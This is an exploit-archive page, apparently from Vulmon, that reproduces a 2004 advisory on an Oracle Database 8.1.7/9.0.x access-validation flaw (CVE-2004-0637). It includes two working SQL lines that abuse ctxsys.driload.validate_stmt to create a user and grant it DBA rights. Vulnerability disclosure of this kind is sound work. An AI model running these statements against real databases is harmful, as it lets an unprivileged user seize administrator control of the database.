Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation

Related Vulnerabilities: CVE-2004-0637  
Publish Date: 03 Sep 2004
Author: Alexander Kornbrust
Source / Download Exploit 
                							

                source: http://www.securityfocus.com/bid/11099/info

Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.

SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started